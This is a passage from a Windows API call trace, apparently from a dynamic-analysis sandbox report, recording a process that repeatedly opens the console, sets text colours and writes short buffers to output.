lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.808] GetLastError () returned 0xcb [0078.808] GetConsoleOutputCP () returned 0x1b5 [0078.809] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.809] GetLastError () returned 0xcb [0078.809] GetConsoleOutputCP () returned 0x1b5 [0078.809] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb30, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb30) returned 0 [0078.809] GetLastError () returned 0xcb [0078.809] GetConsoleOutputCP () returned 0x1b5 [0078.809] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb30, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb30) returned 0 [0078.809] GetLastError () returned 0xcb [0078.809] GetConsoleOutputCP () returned 0x1b5 [0078.809] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb30, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb30) returned 0 [0078.809] GetLastError () returned 0xcb [0078.816] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17 [0078.817] GetLastError () returned 0xcb [0078.817] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x17, lpConsoleScreenBufferInfo=0x5dceb08 | out: lpConsoleScreenBufferInfo=0x5dceb08) returned 1 [0078.817] GetLastError () returned 0xcb [0078.817] GetConsoleOutputCP () returned 0x1b5 [0078.817] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.817] GetLastError () returned 0xcb [0078.819] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0078.819] GetLastError () returned 0xcb [0078.819] GetConsoleMode (in: hConsoleHandle=0x0, lpMode=0x5dceb80 | out: lpMode=0x5dceb80) returned 0 [0078.820] GetLastError () returned 0x6 [0078.824] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b [0078.824] GetLastError () returned 0x6 [0078.824] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x1b, lpConsoleScreenBufferInfo=0x5dceaa8 | out: lpConsoleScreenBufferInfo=0x5dceaa8) returned 1 [0078.824] GetLastError () returned 0x6 [0078.828] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f [0078.866] GetLastError () returned 0x6 [0078.866] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x1f, lpConsoleScreenBufferInfo=0x5dceaa8 | out: lpConsoleScreenBufferInfo=0x5dceaa8) returned 1 [0078.867] GetLastError () returned 0x6 [0078.871] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23 [0078.875] GetLastError () returned 0x6 [0078.875] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x23, lpConsoleScreenBufferInfo=0x5dceab0 | out: lpConsoleScreenBufferInfo=0x5dceab0) returned 1 [0078.875] GetLastError () returned 0x6 [0078.877] SetConsoleTextAttribute (hConsoleOutput=0x23, wAttributes=0xc) returned 1 [0078.877] GetLastError () returned 0x6 [0078.878] CloseHandle (hObject=0x23) returned 1 [0078.879] GetLastError () returned 0x6 [0078.883] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23 [0078.883] GetLastError () returned 0x6 [0078.883] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x23, lpConsoleScreenBufferInfo=0x5dceab0 | out: lpConsoleScreenBufferInfo=0x5dceab0) returned 1 [0078.884] GetLastError () returned 0x6 [0078.884] SetConsoleTextAttribute (hConsoleOutput=0x23, wAttributes=0xc) returned 1 [0078.884] GetLastError () returned 0x6 [0078.885] CloseHandle (hObject=0x23) returned 1 [0078.885] GetLastError () returned 0x6 [0078.885] GetStdHandle (nStdHandle=0xfffffff5) returned 0x2b0 [0078.885] GetLastError () returned 0x6 [0078.885] GetConsoleMode (in: hConsoleHandle=0x2b0, lpMode=0x5dceb18 | out: lpMode=0x5dceb18) returned 0 [0078.885] GetLastError () returned 0x6 [0078.885] GetConsoleOutputCP () returned 0x1b5 [0078.889] GetFileType (hFile=0x2b0) returned 0x3 [0078.890] WriteFile (in: hFile=0x2b0, lpBuffer=0x2d0eee4*, nNumberOfBytesToWrite=0x4f, lpNumberOfBytesWritten=0x5dceab4, lpOverlapped=0x0 | out: lpBuffer=0x2d0eee4*, lpNumberOfBytesWritten=0x5dceab4*=0x4f, lpOverlapped=0x0) returned 1 [0078.892] GetLastError () returned 0x0 [0078.896] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23 [0078.897] GetLastError () returned 0x0 [0078.897] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x23, lpConsoleScreenBufferInfo=0x5dceaac | out: lpConsoleScreenBufferInfo=0x5dceaac) returned 1 [0078.897] GetLastError () returned 0x0 [0078.897] SetConsoleTextAttribute (hConsoleOutput=0x23, wAttributes=0x7) returned 1 [0078.898] GetLastError () returned 0x0 [0078.898] CloseHandle (hObject=0x23) returned 1 [0078.898] GetLastError () returned 0x0 [0078.902] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23 [0078.902] GetLastError () returned 0x0 [0078.902] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x23, lpConsoleScreenBufferInfo=0x5dceaac | out: lpConsoleScreenBufferInfo=0x5dceaac) returned 1 [0078.903] GetLastError () returned 0x0 [0078.903] SetConsoleTextAttribute (hConsoleOutput=0x23, wAttributes=0x7) returned 1 [0078.903] GetLastError () returned 0x0 [0078.903] CloseHandle (hObject=0x23) returned 1 [0078.903] GetLastError () returned 0x0 [0078.903] WriteFile (in: hFile=0x2b0, lpBuffer=0x2d0eee4*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x5dceaf4, lpOverlapped=0x0 | out: lpBuffer=0x2d0eee4*, lpNumberOfBytesWritten=0x5dceaf4*=0x1, lpOverlapped=0x0) returned 1 [0078.904] GetLastError () returned 0x0 [0078.908] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23 [0078.964] GetLastError () returned 0x0 [0078.964] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x23, lpConsoleScreenBufferInfo=0x5dceb08 | out: lpConsoleScreenBufferInfo=0x5dceb08) returned 1 [0078.964] GetLastError () returned 0x0 [0078.964] GetConsoleOutputCP () returned 0x1b5 [0078.964] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0078.964] GetLastError () returned 0x0 [0078.969] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x27 [0078.970] GetLastError () returned 0x0 [0078.970] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x27, lpConsoleScreenBufferInfo=0x5dceaa8 | out: lpConsoleScreenBufferInfo=0x5dceaa8) returned 1 [0078.970] GetLastError () returned 0x0 [0078.974] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b [0078.974] GetLastError () returned 0x0 [0078.974] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2b, lpConsoleScreenBufferInfo=0x5dceaa8 | out: lpConsoleScreenBufferInfo=0x5dceaa8) returned 1 [0078.974] GetLastError () returned 0x0 [0078.978] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f [0078.979] GetLastError () returned 0x0 [0078.979] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2f, lpConsoleScreenBufferInfo=0x5dceab0 | out: lpConsoleScreenBufferInfo=0x5dceab0) returned 1 [0078.979] GetLastError () returned 0x0 [0078.979] SetConsoleTextAttribute (hConsoleOutput=0x2f, wAttributes=0xc) returned 1 [0078.979] GetLastError () returned 0x0 [0078.979] CloseHandle (hObject=0x2f) returned 1 [0078.979] GetLastError () returned 0x0 [0078.983] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f [0078.983] GetLastError () returned 0x0 [0078.983] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2f, lpConsoleScreenBufferInfo=0x5dceab0 | out: lpConsoleScreenBufferInfo=0x5dceab0) returned 1 [0078.984] GetLastError () returned 0x0 [0078.984] SetConsoleTextAttribute (hConsoleOutput=0x2f, wAttributes=0xc) returned 1 [0078.984] GetLastError () returned 0x0 [0078.984] CloseHandle (hObject=0x2f) returned 1 [0078.984] GetLastError () returned 0x0 [0078.984] WriteFile (in: hFile=0x2b0, lpBuffer=0x2d0eee4*, nNumberOfBytesToWrite=0x4f, lpNumberOfBytesWritten=0x5dceab4, lpOverlapped=0x0 | out: lpBuffer=0x2d0eee4*, lpNumberOfBytesWritten=0x5dceab4*=0x4f, lpOverlapped=0x0) returned 1 [0078.985] GetLastError () returned 0x0 [0078.989] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f [0078.989] GetLastError () returned 0x0 [0078.989] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2f, lpConsoleScreenBufferInfo=0x5dceaac | out: lpConsoleScreenBufferInfo=0x5dceaac) returned 1 [0078.989] GetLastError () returned 0x0 [0078.989] SetConsoleTextAttribute (hConsoleOutput=0x2f, wAttributes=0x7) returned 1 [0078.989] GetLastError () returned 0x0 [0078.989] CloseHandle (hObject=0x2f) returned 1 [0078.990] GetLastError () returned 0x0 [0078.993] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f [0078.993] GetLastError () returned 0x0 [0078.993] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2f, lpConsoleScreenBufferInfo=0x5dceaac | out: lpConsoleScreenBufferInfo=0x5dceaac) returned 1 [0078.994] GetLastError () returned 0x0 [0078.994] SetConsoleTextAttribute (hConsoleOutput=0x2f, wAttributes=0x7) returned 1 [0078.994] GetLastError () returned 0x0 [0078.994] CloseHandle (hObject=0x2f) returned 1 [0078.994] GetLastError () returned 0x0 [0078.994] WriteFile (in: hFile=0x2b0, lpBuffer=0x2d0eee4*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x5dceaf4, lpOverlapped=0x0 | out: lpBuffer=0x2d0eee4*, lpNumberOfBytesWritten=0x5dceaf4*=0x1, lpOverlapped=0x0) returned 1 [0078.994] GetLastError () returned 0x0 [0078.998] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f [0079.004] GetLastError () returned 0x0 [0079.004] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2f, lpConsoleScreenBufferInfo=0x5dceb08 | out: lpConsoleScreenBufferInfo=0x5dceb08) returned 1 [0079.004] GetLastError () returned 0x0 [0079.004] GetConsoleOutputCP () returned 0x1b5 [0079.004] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0079.004] GetLastError () returned 0x0 [0079.008] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33 [0079.008] GetLastError () returned 0x0 [0079.008] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x33, lpConsoleScreenBufferInfo=0x5dceaa8 | out: lpConsoleScreenBufferInfo=0x5dceaa8) returned 1 [0079.008] GetLastError () returned 0x0 [0079.012] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37 [0079.012] GetLastError () returned 0x0 [0079.012] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x37, lpConsoleScreenBufferInfo=0x5dceaa8 | out: lpConsoleScreenBufferInfo=0x5dceaa8) returned 1 [0079.012] GetLastError () returned 0x0 [0079.016] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b [0079.016] GetLastError () returned 0x0 [0079.016] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3b, lpConsoleScreenBufferInfo=0x5dceab0 | out: lpConsoleScreenBufferInfo=0x5dceab0) returned 1 [0079.016] GetLastError () returned 0x0 [0079.016] SetConsoleTextAttribute (hConsoleOutput=0x3b, wAttributes=0xc) returned 1 [0079.017] GetLastError () returned 0x0 [0079.017] CloseHandle (hObject=0x3b) returned 1 [0079.017] GetLastError () returned 0x0 [0079.021] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b [0079.021] GetLastError () returned 0x0 [0079.021] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3b, lpConsoleScreenBufferInfo=0x5dceab0 | out: lpConsoleScreenBufferInfo=0x5dceab0) returned 1 [0079.021] GetLastError () returned 0x0 [0079.021] SetConsoleTextAttribute (hConsoleOutput=0x3b, wAttributes=0xc) returned 1 [0079.021] GetLastError () returned 0x0 [0079.021] CloseHandle (hObject=0x3b) returned 1 [0079.022] GetLastError () returned 0x0 [0079.022] WriteFile (in: hFile=0x2b0, lpBuffer=0x2d0eee4*, nNumberOfBytesToWrite=0x3e, lpNumberOfBytesWritten=0x5dceab4, lpOverlapped=0x0 | out: lpBuffer=0x2d0eee4*, lpNumberOfBytesWritten=0x5dceab4*=0x3e, lpOverlapped=0x0) returned 1 [0079.022] GetLastError () returned 0x0 [0079.025] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b [0079.025] GetLastError () returned 0x0 [0079.025] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3b, lpConsoleScreenBufferInfo=0x5dceaac | out: lpConsoleScreenBufferInfo=0x5dceaac) returned 1 [0079.026] GetLastError () returned 0x0 [0079.026] SetConsoleTextAttribute (hConsoleOutput=0x3b, wAttributes=0x7) returned 1 [0079.026] GetLastError () returned 0x0 [0079.026] CloseHandle (hObject=0x3b) returned 1 [0079.026] GetLastError () returned 0x0 [0079.030] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b [0079.030] GetLastError () returned 0x0 [0079.030] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3b, lpConsoleScreenBufferInfo=0x5dceaac | out: lpConsoleScreenBufferInfo=0x5dceaac) returned 1 [0079.030] GetLastError () returned 0x0 [0079.030] SetConsoleTextAttribute (hConsoleOutput=0x3b, wAttributes=0x7) returned 1 [0079.030] GetLastError () returned 0x0 [0079.031] CloseHandle (hObject=0x3b) returned 1 [0079.031] GetLastError () returned 0x0 [0079.031] WriteFile (in: hFile=0x2b0, lpBuffer=0x2d0eee4*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x5dceaf4, lpOverlapped=0x0 | out: lpBuffer=0x2d0eee4*, lpNumberOfBytesWritten=0x5dceaf4*=0x1, lpOverlapped=0x0) returned 1 [0079.031] GetLastError () returned 0x0 [0079.034] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b [0079.034] GetLastError () returned 0x0 [0079.034] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3b, lpConsoleScreenBufferInfo=0x5dceb08 | out: lpConsoleScreenBufferInfo=0x5dceb08) returned 1 [0079.035] GetLastError () returned 0x0 [0079.035] GetConsoleOutputCP () returned 0x1b5 [0079.035] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0079.035] GetLastError () returned 0x0 [0079.038] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f [0079.039] GetLastError () returned 0x0 [0079.039] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3f, lpConsoleScreenBufferInfo=0x5dceaa8 | out: lpConsoleScreenBufferInfo=0x5dceaa8) returned 1 [0079.039] GetLastError () returned 0x0 [0079.042] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43 [0079.072] GetLastError () returned 0x0 [0079.072] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x43, lpConsoleScreenBufferInfo=0x5dceaa8 | out: lpConsoleScreenBufferInfo=0x5dceaa8) returned 1 [0079.073] GetLastError () returned 0x0 [0079.078] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47 [0079.078] GetLastError () returned 0x0 [0079.078] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x47, lpConsoleScreenBufferInfo=0x5dceab0 | out: lpConsoleScreenBufferInfo=0x5dceab0) returned 1 [0079.078] GetLastError () returned 0x0 [0079.078] SetConsoleTextAttribute (hConsoleOutput=0x47, wAttributes=0xc) returned 1 [0079.078] GetLastError () returned 0x0 [0079.079] CloseHandle (hObject=0x47) returned 1 [0079.079] GetLastError () returned 0x0 [0079.083] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47 [0079.083] GetLastError () returned 0x0 [0079.083] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x47, lpConsoleScreenBufferInfo=0x5dceab0 | out: lpConsoleScreenBufferInfo=0x5dceab0) returned 1 [0079.083] GetLastError () returned 0x0 [0079.083] SetConsoleTextAttribute (hConsoleOutput=0x47, wAttributes=0xc) returned 1 [0079.084] GetLastError () returned 0x0 [0079.084] CloseHandle (hObject=0x47) returned 1 [0079.084] GetLastError () returned 0x0 [0079.084] WriteFile (in: hFile=0x2b0, lpBuffer=0x2d0eee4*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x5dceab4, lpOverlapped=0x0 | out: lpBuffer=0x2d0eee4*, lpNumberOfBytesWritten=0x5dceab4*=0x11, lpOverlapped=0x0) returned 1 [0079.084] GetLastError () returned 0x0 [0079.088] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47 [0079.088] GetLastError () returned 0x0 [0079.088] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x47, lpConsoleScreenBufferInfo=0x5dceaac | out: lpConsoleScreenBufferInfo=0x5dceaac) returned 1 [0079.088] GetLastError () returned 0x0 [0079.089] SetConsoleTextAttribute (hConsoleOutput=0x47, wAttributes=0x7) returned 1 [0079.089] GetLastError () returned 0x0 [0079.089] CloseHandle (hObject=0x47) returned 1 [0079.089] GetLastError () returned 0x0 [0079.093] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47 [0079.093] GetLastError () returned 0x0 [0079.093] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x47, lpConsoleScreenBufferInfo=0x5dceaac | out: lpConsoleScreenBufferInfo=0x5dceaac) returned 1 [0079.093] GetLastError () returned 0x0 [0079.093] SetConsoleTextAttribute (hConsoleOutput=0x47, wAttributes=0x7) returned 1 [0079.093] GetLastError () returned 0x0 [0079.094] CloseHandle (hObject=0x47) returned 1 [0079.094] GetLastError () returned 0x0 [0079.094] WriteFile (in: hFile=0x2b0, lpBuffer=0x2d0eee4*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x5dceaf4, lpOverlapped=0x0 | out: lpBuffer=0x2d0eee4*, lpNumberOfBytesWritten=0x5dceaf4*=0x1, lpOverlapped=0x0) returned 1 [0079.094] GetLastError () returned 0x0 [0079.098] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47 [0079.098] GetLastError () returned 0x0 [0079.098] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x47, lpConsoleScreenBufferInfo=0x5dceb08 | out: lpConsoleScreenBufferInfo=0x5dceb08) returned 1 [0079.098] GetLastError () returned 0x0 [0079.098] GetConsoleOutputCP () returned 0x1b5 [0079.098] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5dceb10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5dceb10) returned 0 [0079.099] GetLastError () returned 0x0 [0079.102] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4b [0079.102] GetLastError () returned 0x0 [0079.102] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x4b, lpConsoleScreenBufferInfo=0x5dceaa8 | out: lpConsoleScreenBufferInfo=0x5dceaa8) returned 1 [0079.102] GetLastError () returned 0x0 [0079.106] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4f [0079.106] GetLastError () returned 0x0 [0079.106] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x4f, lpConsoleScreenBufferInfo=0x5dceaa8 | out: lpConsoleScreenBufferInfo=0x5dceaa8) returned 1 [0079.107] GetLastError () returned 0x0 [0079.110] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53 [0079.113] GetLastError () returned 0x0 [0079.113] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x53, lpConsoleScreenBufferInfo=0x5dceab0 | out: lpConsoleScreenBufferInfo=0x5dceab0) returned 1 [0079.113] GetLastError () returned 0x0 [0079.113] SetConsoleTextAttribute (hConsoleOutput=0x53, wAttributes=0xc) returned 1 [0079.113] GetLastError () returned 0x0 [0079.113] CloseHandle (hObject=0x53) returned 1 [0079.114] GetLastError () returned 0x0 [0079.118] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53 [0079.119] GetLastError () returned 0x0 [0079.119] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x53, lpConsoleScreenBufferInfo=0x5dceab0 | out: lpConsoleScreenBufferInfo=0x5dceab0) returned 1 [0079.119] GetLastError () returned 0x0 [0079.119] SetConsoleTextAttribute (hConsoleOutput=0x53, wAttributes=0xc) returned 1 [0079.119] GetLastError () returned 0x0 [0079.119] CloseHandle (hObject=0x53) returned 1 [0079.119] GetLastError () returned 0x0 [0079.120] WriteFile (in: hFile=0x2b0, lpBuffer=0x2d0eee4*, nNumberOfBytesToWrite=0x21, lpNumberOfBytesWritten=0x5dceab4, lpOverlapped=0x0 | out: lpBuffer=0x2d0eee4*, lpNumberOfBytesWritten=0x5dceab4*=0x21, lpOverlapped=0x0) returned 1 [0079.120] GetLastError () returned 0x0 [0079.123] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53 [0079.124] GetLastError () returned 0x0 [0079.124] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x53, lpConsoleScreenBufferInfo=0x5dceaac | out: lpConsoleScreenBufferInfo=0x5dceaac) returned 1 [0079.124] GetLastError () returned 0x0 [0079.124] SetConsoleTextAttribute (hConsoleOutput=0x53, wAttributes=0x7) returned 1 [0079.124] GetLastError () returned 0x0 [0079.124] CloseHandle (hObject=0x53) returned 1 [0079.124] GetLastError () returned 0x0 [0079.128] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53 [0079.129] GetLastError () returned 0x0 [0079.129] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x53, lpConsoleScreenBufferInfo=0x5dceaac | out: lpConsoleScreenBufferInfo=0x5dceaac) returned 1 [0079.129] GetLastError () returned 0x0 [0079.129] SetConsoleTextAttribute (hConsoleOutput=0x53, wAttributes=0x7) returned 1 [0079.129] GetLastError () returned 0x0 [0079.129] CloseHandle (hObject=0x53) returned 1 [0079.129] GetLastError () returned 0x0 [0079.130] WriteFile (in: hFile=0x2b0, lpBuffer=0x2d0eee4*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x5dceaf4, lpOverlapped=0x0 | out: lpBuffer=0x2d0eee4*, lpNumberOfBytesWritten=0x5dceaf4*=0x1, lpOverlapped=0x0) returned 1 [0079.130] GetLastError () returned 0x0 [0079.133] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x53 [0079.134] GetLastError () returned 0x0 [0079.134] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x53, lpConsoleScreenBufferInfo=0x5dceb08 